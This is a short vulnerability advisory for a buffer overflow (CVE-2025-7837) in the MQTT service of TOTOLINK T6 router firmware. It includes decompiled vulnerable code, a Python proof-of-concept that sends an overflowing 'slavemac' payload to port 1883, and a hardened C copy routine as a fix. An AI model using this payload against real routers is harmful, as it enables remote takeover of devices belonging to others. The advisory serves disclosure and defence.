### Key Information

#### Vulnerability Identifier

- **CVE ID**: CVE-2025-7837

#### Affected Scope

- **Vendor**: TOTOLINK
- **Affected Product**: T6
- **Affected Firmware Version**: V4.1.5cu.748_B20211015

#### Vulnerability Overview

- **Vulnerability Type**: Buffer Overflow
- **Service**: MQTT
- **Port**: 1883
- **Impact**: Can lead to Remote Code Execution (RCE)

#### Vulnerability Details

- **Problem Function**: `recvSlaveStainfo`
- **Problem Code**:

  ```c
  char dest[4]; // [sp+4h] [bp-1Ch] BYREF
  int v9; // [sp+8h] [bp-18h]
  int v10; // [sp+Ch] [bp-14h]
  int v11; // [sp+10h] [bp-10h]

  v9 = dest;
  strcpy(dest, Var);
  ```

- **Description**: The `dest` buffer has a size of 4 bytes, but `strcpy` does not check the input length, leading to a buffer overflow.

#### Attack Method

- **Attack Vector**: Sending malicious MQTT packets
- **Example**:

  ```python
  import paho.mqtt.client as mqtt

  payload = b'A' * 36 + b'\x37\x23\x39\x13'
  client = mqtt.Client()
  client.connect("192.168.8.1", 1883, 60)
  client.publish("/totolink/router/recvSlaveStainfo", b"{'slavemac':'%s'}" % payload)
  ```

#### Conclusion

This vulnerability allows attackers to exploit a buffer overflow by sending specially crafted MQTT packets, leading to remote code execution, posing a severe security threat to affected devices.
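
The unbounded `strcpy` into the 4-byte `dest` buffer in `recvSlaveStainfo` is the root cause described above. The following is an added example, not vendor firmware code, of a length- and format-checked copy; it assumes the `slavemac` field is meant to hold a colon-separated MAC address, and the names `is_mac_string` and `copy_slavemac` are hypothetical.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAC_STR_LEN 17 /* "aa:bb:cc:dd:ee:ff" (assumed format of slavemac) */

/* Hypothetical helper: returns 1 only for an exact colon-separated MAC. */
static int is_mac_string(const char *s)
{
    if (s == NULL)
        return 0;
    for (size_t i = 0; i < MAC_STR_LEN; i++) {
        /* A NUL byte fails both checks, so we never read past the end. */
        if (i % 3 == 2 ? s[i] != ':' : !isxdigit((unsigned char)s[i]))
            return 0;
    }
    return s[MAC_STR_LEN] == '\0'; /* reject anything longer */
}

/*
 * Hypothetical replacement for strcpy(dest, Var): the caller passes the
 * real size of dest, and the value is copied only if it is a well-formed
 * MAC that fits. Returns 0 on success, -1 on rejection (dest left empty).
 */
int copy_slavemac(char *dest, size_t dest_size, const char *value)
{
    if (dest == NULL || dest_size == 0)
        return -1;
    dest[0] = '\0';
    if (dest_size < MAC_STR_LEN + 1 || !is_mac_string(value))
        return -1;
    memcpy(dest, value, MAC_STR_LEN);
    dest[MAC_STR_LEN] = '\0';
    return 0;
}

int main(void)
{
    char mac[MAC_STR_LEN + 1];
    /* Constructed inputs: one valid MAC and one oversized value. */
    int ok = copy_slavemac(mac, sizeof mac, "00:11:22:aa:bb:cc");
    int bad = copy_slavemac(mac, sizeof mac,
                            "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    return (ok == 0 && bad == -1) ? 0 : 1;
}
```

Rejecting on format as well as length means an oversized or malformed `slavemac` value never reaches the stack buffer, and a destination as small as the original 4-byte `dest` is refused outright.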